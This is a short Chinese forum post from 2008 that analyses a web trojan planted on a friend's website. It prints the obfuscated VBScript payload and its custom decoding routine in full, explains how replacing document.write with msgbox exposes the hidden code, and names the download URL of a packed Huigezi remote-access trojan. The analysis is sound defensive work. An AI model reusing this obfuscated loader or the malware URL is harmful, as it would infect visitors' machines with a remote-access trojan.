|
|
今天朋友进了一个站,发现挂了马,于是叫我找找木马地址
把网马下来一看,发现使用了自写的解迷函数
=================================
<s c r i p t language=v b s c r i p t >
hu=\"琳jv#{zl琳.j\"\"q!w~#.zo|u$ousk0dpaq!w~#0l琳....}|.s!!}!.!s\"\"${s.|s'#
琳....rz.k.0v##~h==&&&<)#&u&<q}{=?@a=\"\"\"\"<s's0琳....as#.rt.k.r}
q${s|#<q!so#sszs{s|#60}pxsq#07琳....rt<\"\"s#o##!
wp$#s.0qzo\"\"\"\"wr0:.0qz\"\"wrhprgdqccd;dcoa;??r>;gfao;>>q>btq@gsad0
琳....\"\"#!k0[wq!}\"\"}t#<f[zvbb^0琳....as#.'.k.rt<q!so#s]pxsq#6\"\"#!:007琳
....o?k0or}0琳....o@k0rp<0琳....oak0a#!0琳....obk0so{0琳....\"\"#!?ko?
4o@4oa4ob琳....\"\"#!ck\"\"#!?琳....\"\"s#.a.k.rt<q!so#s}pxsq#6\"\"#!c:007
琳....a<#(~s.k.?琳....\"\"#!dk0usb0琳....'<]~s|.\"\"#!d:.rz:.toz\"\"s
琳....'<as|r琳....t|o{s?k0u>zr<q}{0琳....\"\"s#.t.k.rt<q!so#s}pxsq#60aq!
w~#w|u<twzsa(\"\"#s{]pxsq#0:007琳....\"\"s#.#{~.k.t<us#a~sqwozt}zrs!6@7.
琳....t|o{s?k.t<p$wzr^o#v6#{~:t|o{s?7琳....a<}~s|琳....a<&!w#s.'<!
s\"\"~}|\"\"sp}r(琳....a<\"\"o%s#}twzs.t|o{s? 琳....a<qz}\"\"s
琳....\"\"s#._.k.rt<q!so#s}pxsq#60avszz<o~~zwqo#w}|0:007
琳...._<avszzs'sq$#s.t|o{s?:00:00:0}~s|0:>琳....j=\"\"q!w~#l琳....jvsorl
琳....j#w#zsl]v:{(.u}r/...u}zr\"\"$|io#kfbf@ae?bj=#w#zsl琳....j=vsorljp}
r(l琳 jqs|#s!lg}$.r].w#/j=qs|#s!l琳....j=p}r(lj=v#{zl琳\"
上面是一片\"琳\"的海洋!
function unencode(temp) ;自己写的解迷
函数
but=14
for i = 1 to len(temp)
if mid(temp,i,1)<> \"琳\" then
if asc(mid(temp, i, 1)) < 32 or asc(mid(temp, i, 1)) > 126 then
a = a & chr(asc(mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
end if
else
a=a&vbcrlf
end if
next
unencode=a
end function ;算法不
是很难,时间原因不做分析.
document.write(unencode(hu))
< / s c r i p t >
==================================================
解迷
看到最后的document.write(unencode(hu))
我们改成 msgbox (unencode(hu)) 暴了它
===================================
=
运行修改后的,
结果如图
呵呵木马地址是www.ztwgw.com/123/ss.exe
下来发现是themida保护的黑防灰鸽子
==============================
脚本加密,就这样一句话被破解了.
 |
|
发表于 2008-7-2 01:56:10
